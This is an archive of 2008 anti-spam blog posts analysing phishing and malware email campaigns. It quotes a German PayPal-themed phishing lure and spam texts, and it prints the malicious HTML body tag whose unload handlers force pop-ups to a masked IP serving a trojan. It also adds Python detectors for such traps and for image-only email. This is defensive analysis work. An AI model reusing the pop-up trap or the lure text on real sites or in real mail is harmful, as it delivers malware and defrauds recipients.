Outbreak of vertical Chinese spam
June 25, 2008 Leave a Comment
Our friends at Commtouch have identified an outbreak of vertical Chinese spam. Quite some interesting reading if you ask me.
mx lab blog – all about anti virus and anti spam
June 23, 2008 2 Comments
Virus outbreaks like in the past, when tons of emails contained a virus, trojan or other malicious file as an attachment, are rare these days.
Distributors of these kinds of malicious code use other techniques to get their files onto your computer. By email they try to attract your attention and get you to click on a link to visit a web site. This web site then contains a script that will download the virus, trojan, or whatever malicious piece of code onto your desktop. It is then very likely that your computer becomes part of a zombie botnet.
However, viruses by email aren’t dead yet. During the last few weeks MX Lab has detected and intercepted emails with new virus variants. These viruses are attached to an email that mentions “You have received a Hallmark E-Card” or “Hot Pictures” and are packed in a .zip or .rar archive.
Let’s find out how MX Lab performs with its zero hour anti virus technology and why you still need a very good anti virus scanning and filtering service.
How does the zero hour anti virus of MX Lab perform?
At 20:55 – local Belgium time – MX Lab detected some emails containing a .rar archive that were intercepted by our zero hour anti virus. The emails are in the German language with subjects like Abbuchungserlaubnis, Ihr neuer Arbeitsvertrag and Tilgungvertrag. This is an example of the content (translated from the German):
Dear Sir, dear Madam!
Your direct debit order no. 418541651249 has been completed.
An amount of 2927.00 EURO has been debited and will appear on your bank statement as “Paypalabbuchung ”.
You will find the details of the invoice in the attachment.
PayPal (Europe) S.à r.l. & Cie, S.C.A.
22-24 Boulevard Royal
L-2449 Luxembourg
Authorised representative: Brent Bellm
Commercial register number: R.C.S. Luxembourg B 118 349
Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 418541651249 wurde erfullt.
Ein Betrag von 2927.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als “Paypalabbuchung ” angezeigt.
Sie finden die Details zu der Rechnung im AnhangPayPal (Europe) S.224; r.l. & Cie, S.C.A.
22-24 Boulevard Royal
L-2449 LuxembourgVertretungsberechtigter: Brent Bellm
Handelsregisternummer: R.C.S. Luxembourg B 118 349
At 22:04 we analysed the email and sent the extracted Rechnung.exe file to Virus Total. Virus Total scans each uploaded file with 34 anti virus engines.
This is the result: only 13 of the 34 anti virus engines detected the virus!
Antivirus            Version  Last Update  Result
AhnLab-V3            -        -            -
AntiVir              -        -            -
Authentium           -        -            W32/Trojan2.ASYN
Avast                -        -            -
AVG                  -        -            -
BitDefender          -        -            -
CAT-QuickHeal        -        -            (Suspicious) – DNAScan
ClamAV               -        -            PUA.Packed.NPack-2
DrWeb                -        -            -
eSafe                -        -            -
eTrust-Vet           -        -            -
Ewido                -        -            -
F-Prot               -        -            -
F-Secure             -        -            Suspicious:W32/Malware!Gemini
Fortinet             -        -            -
GData                -        -            -
Ikarus               -        -            Win32.Outbreak
Kaspersky            -        -            -
McAfee               -        -            New Malware.co
Microsoft            -        -            Trojan:Win32/Zbot.CX
NOD32v2              -        -            -
Norman               -        -            -
Panda                -        -            Suspicious file
Prevx1               -        -            -
Rising               -        -            -
Sophos               -        -            Sus/UnkPacker
Sunbelt              -        -            VIPRE.Suspicious
Symantec             -        -            -
TheHacker            -        -            W32/Behav-Heuristic-068
TrendMicro           -        -            PAK_Generic.002
VBA32                -        -            -
VirusBuster          -        -            -
Webwasher-Gateway    -        -            Win32.Malware.gen (suspicious)
Conclusion
Since some major anti virus software vendors like Kaspersky, Symantec, Avast, BitDefender,… don’t have a detection for this one, you could face a serious security risk when you handle the incoming email without some attention. It is not the first time that we notice such a low detection rate when we analyse a file at Virus Total.
It is clear that a signature based anti virus engine alone isn’t sufficient. Combined with the zero hour anti virus service of MX Lab you will have much better protection against viruses.
June 19, 2008 Leave a Comment
The latest malware outbreak tries to attract our attention with subject lines such as: Paris Hilton found to be gay!, China Earthquake claims 1 million lives, Star Trek star dies at age 79, Man wakes up from 40 year coma, Batman latest movie bombs at box office or Italy knocked out of Euro 2008. So far, over 500 emails have been intercepted within 40 minutes.
The email content is on two lines only. It can be anything from “Don’t belittle the effects of power enlargement” to “Don’t make the postman make too many attempted deliveries to get you the herbal solution that will change your life” or “Heir to Prada empire found strangled”. The malicious link is in the format http://****.de/r.html and redirects you to PornTube, a YouTube design rip-off.

And no, we are not giving you a full screenshot of this web site.
Once you get there, a link behind the scenes is made to a server IP xx.xxx.xx.xx/index.php with some scripting in the HTML body tag: <body onbeforeunload="window.open('http://xx.xxx.xx.xx/index.php');" onunload="window.open('http://xx.xxx.xx.xx/index.php');" onclose="window.open('http://xx.xxx.xx.xx/index.php');" id="mainbody">
This connection will try to download the file video.exe directly to your computer. Some pop-up windows will appear stating that you need to download an ActiveX object to run the videos, and it doesn’t matter if you click Cancel or No: you get stuck in a loop until you download video.exe. Closing your windows or browser is the only option, and even then you get a new browser window opening at this server again.
As far as I have investigated this for now, it appears that the URLs http://****.de/r.html used in this malware outbreak, which change quite rapidly, could in fact be hacked servers hosting valid web sites, where the r.html file is placed in the web hosting root of the site. Some images are missing and that’s why the design of PornTube isn’t exactly like the design of YouTube. According to a WHOIS lookup the IP address is registered in Amsterdam, The Netherlands. The video.exe is a variant of Trojan.Downloader.Win32Agent.tyw.
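The body tag quoted above is a good candidate for a simple mail-gateway or sandbox check: pop-ups fired from unload-style event handlers are rarely legitimate, and a bare IP address as the pop-up target is a further warning sign. The following scanner is an added example, not code from the post or from MX Lab; the sample HTML and the 192.0.2.10 address (an RFC 5737 documentation address) are constructed.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Event handlers that fire when the visitor tries to leave the page;
# window.open() in these is the classic "you cannot close this page" trap.
UNLOAD_EVENTS = {"onunload", "onbeforeunload", "onclose"}
WINDOW_OPEN = re.compile(r"""window\.open\(\s*['"]([^'"]+)['"]""", re.I)


class UnloadTrapScanner(HTMLParser):
    """Collect window.open() targets found in unload-style event handlers."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, event, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in UNLOAD_EVENTS and value:
                for url in WINDOW_OPEN.findall(value):
                    self.findings.append((tag, name.lower(), url))


def is_raw_ip_host(url):
    """True when the URL host is a bare IP address rather than a host name."""
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scan_html(html):
    """Return one dict per unload-handler pop-up found in the HTML."""
    scanner = UnloadTrapScanner()
    scanner.feed(html)
    return [{"tag": tag, "event": event, "url": url, "raw_ip": is_raw_ip_host(url)}
            for tag, event, url in scanner.findings]


# Constructed sample modelled on the body tag quoted in the post.
SAMPLE = ('<html><body onbeforeunload="window.open(\'http://192.0.2.10/index.php\');" '
          'onunload="window.open(\'http://192.0.2.10/index.php\');" '
          'onclose="window.open(\'http://192.0.2.10/index.php\');" id="mainbody">'
          '<a href="http://www.example.com/video">watch</a></body></html>')

if __name__ == "__main__":
    for hit in scan_html(SAMPLE):
        print(hit)
```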
June 19, 2008 Leave a Comment
Even spammers have noticed the high oil prices and are offering really good deals.
Hi Emarketer,
With over 20,000 satisfied customers worldwide and 900 registered manufacturers, Water4Gas is quickly becoming the web’s standard for DIY technology to save fuel using WATER!
Water4Gas is running a limited-time F’ree Gift at http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118
They are offering a 7-day e-mail course so you can learn this in your spare time, daily. This course is normally priced at $49.95 but FOR A LIMITED TIME ONLY are giving it away FREE to a limited number of students. (Deadline unknown, may disappear any moment.) You do NOT have to buy anything or answer any questions!!! I just want you to have this information. Each lesson is easy and short. In about 10 minutes a day you will discover the simplicity and power of using water to clean emissions and save tons of fuel in your car or truck.
Also in this course: ways to MAKE MONEY from this!
If you’ve been searching for a unique way to SAVE $$$ ON FUEL, grab this f’ree deal – perfect for this time of rising gas costs:
http://www.*****.com/cgi-bin/arp3/arp3-t.pl?l=101&c=2799118
Happy Mileage!
Gerald Aumaugher
gerald@aumaugher.us
251 CR 2603
Pittsburg, TX
903-231-4040
As you may know already, I never follow the complete URLs they provide me in the spam. I love to take a look around on their server. The domain www.*****.com just contains the text “Placeholder for *****.com”.
Following the complete link we get to http://******.info/water4fuel.
When looking further on http://******.info/index.php I get a web site with the title Spider Web Marketing. The site contains some articles regarding this Water4Gas promo and it seems like there are more promotions and email campaign texts from the past as well. Okay, back to the main objective.
A very lovely Rachel welcomes you as a visitor on runyourcaronwater.com. The URLs mentioned don’t match quite well. But that’s a minor issue.
Looks very promising: no more high priced fuel needed, just water to keep on driving. “Create your own water hybrid for under $150!”. Let’s read further. I only need less than approximately $60 in raw materials, and the price of all this is at the bottom of the page. Let’s keep on scrolling further down and there we have it. The regular value is $297 but we can get it at $49.97. What a saving!
Too good to be true if you ask me.
June 17, 2008 Leave a Comment
Our latest clients include:
Khainata – Webdesigners
This ISP from Bolivia offers web design, hosting, streaming and domain registration services for its clients. Khainata – Webdesigners have chosen MX Lab after setting up a trial.
FXR Consultores, S.A. de C.V.
FXR offers IT consulting, network integration, computer equipment and web design services in Mexico.
MC-SQUARE
MC-SQUARE, Belgium, provides a comprehensive range of office solutions. MX Lab provides protection for the .be, .com and .nl MC-SQUARE domains.
June 11, 2008 1 Comment
“Over 50 percent of images in promotional emails are routinely blocked by email and webmail programs, says a recent survey by the Email Experience Council (eec), the email marketing arm of the Direct Marketing Association (DMA), writes MarketingCharts.”
This article states that 57% of these campaigns are almost completely image based. Such campaigns are more likely to be caught by spam filters and by the anti spam countermeasures deployed on the local computer. Not to forget that most email clients now turn off showing images from external online sources in the email body for security reasons.
Now, take a standard SpamAssassin installation with the default rules and analyse some emails with text and images and some image-only emails. You will notice that SpamAssassin gives the image-only email some extra scoring, while the email with text and images gets a lower score. The lower score can result in the message being delivered, while the image-only email is placed in quarantine or blocked as spam.
Marketeers need to be aware of the fact that image based email is often confused with spam email, since spam is also quite often image-only.
Another point is that images aren’t shown by default in email clients when the message is received, as this is a security feature of the email client. In that case the message that you want to deliver as a marketeer or e-campaign administrator isn’t viewable for the receiver.
Personally, when I receive image-only email I think it can’t be interesting, there is no content, and therefore it gets deleted.
Marketeers, and everyone else who sends newsletters or email based campaigns, need to be aware of certain points to get past spam filters, get the email into the inbox and attract the receiver’s attention. This can only be done by offering content and information with a balance between the text and image parts. This results in a more complex HTML email template and some additional testing, but it will be worth the effort.
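The text-versus-image balance described above is easy to measure at the gateway. The classifier below is an added example written for this post, not code from MX Lab and not SpamAssassin’s own HTML_IMAGE_ONLY_* rule implementation; the 400-byte text threshold and the two sample messages are this example’s own assumptions.

```python
import email
from email import policy
from html.parser import HTMLParser


class _HtmlStats(HTMLParser):
    """Count visible text bytes and <img> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.text_bytes = 0
        self.images = 0
        self._skip = False  # inside <script> or <style>, not visible text

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images += 1
        elif tag in ("script", "style"):
            self._skip = True

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.text_bytes += len(data.strip().encode())


def image_text_profile(raw_message, min_text_bytes=400):
    """Classify a raw RFC 822 message as 'text', 'mixed' or 'image-only'.

    The threshold is an assumption of this example, not a SpamAssassin value.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:  # no HTML body at all: nothing to hide in images
        return {"kind": "text", "images": 0, "text_bytes": 0}
    stats = _HtmlStats()
    stats.feed(html_part.get_content())
    if stats.images == 0:
        kind = "text"
    elif stats.text_bytes < min_text_bytes:
        kind = "image-only"
    else:
        kind = "mixed"
    return {"kind": kind, "images": stats.images, "text_bytes": stats.text_bytes}


# Constructed samples: an image-only newsletter and the same one with body text.
IMAGE_ONLY = ("From: promo@example.com\r\nTo: you@example.net\r\n"
              "Subject: June offers\r\nContent-Type: text/html\r\n\r\n"
              '<html><body><a href="http://example.com/x"><img src="http://example.com/promo.gif"></a>'
              "</body></html>\r\n")
MIXED = IMAGE_ONLY.replace("</a>", "</a><p>" + "Plain readable offer text. " * 20 + "</p>")
```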
June 3, 2008 Leave a Comment
Quite some “love” related messages are present in our global message logs. There is a malware outbreak going on at the moment and some campaigns are related to “love”.
The messages are simple, have subjects like “Lost In Love”, “I belong to you”, “All I need is You” and contain a romantic image. The malware site drops a Storm worm variant known as Zhelatin or Nuwar on your desktop.

A variant on this is where the spam message contains “I love you so much! http://xxx.xxx.xxx.xxx/”. The URL allows for a direct IP based connection to a server that is hosting the malware.
Another “love” campaign has the subject “Paris Hilton loves you too”, contains “You now know the importance of an increased length” in the body and a link to a web site to increase your… I think you’ll get the idea. Okay then.
Not “love” related but potentially dangerous malware are the messages with the subject “Your video file e.vanherck”. The subject contains the user part of an email address. The URL lets you download video.exe, the Trojan-Downloader.Win32.Exchanger.cq, a regular client in the malware world.
June 3, 2008 Leave a Comment
According to CNet, Google will tackle two serious issues: a cross-site scripting issue on the login page of the communication platform Grand Central and, more importantly if you receive this type of spam, the URL spoofing technique that spammers use.
On this blog I posted, in May, an article about DoubleClick URLs also being used in spam, just like Google ones. As a result, email users click on a URL that appears to direct them to Google.com but instead redirects them to a potentially malicious site or a web site advertised by the spammer, like an online pharmacy.
“Open URL redirection is an issue we take very seriously. As we become aware of open URL redirectors on google.com, we actively work to close them. We are also aware of redirectors using doubleclick.com and are working to address this issue,” the Google spokesman said.
This sounds great. Now it is time for the spammers to develop a new technique. Fingers crossed.
June 2, 2008 Leave a Comment
MX Lab provides a new major update of MX Lab Admin, the management interface for clients. The update includes new features, support for multiple languages, interface enhancements like date range selector tools, animated Flash charts, new statistics reports and more.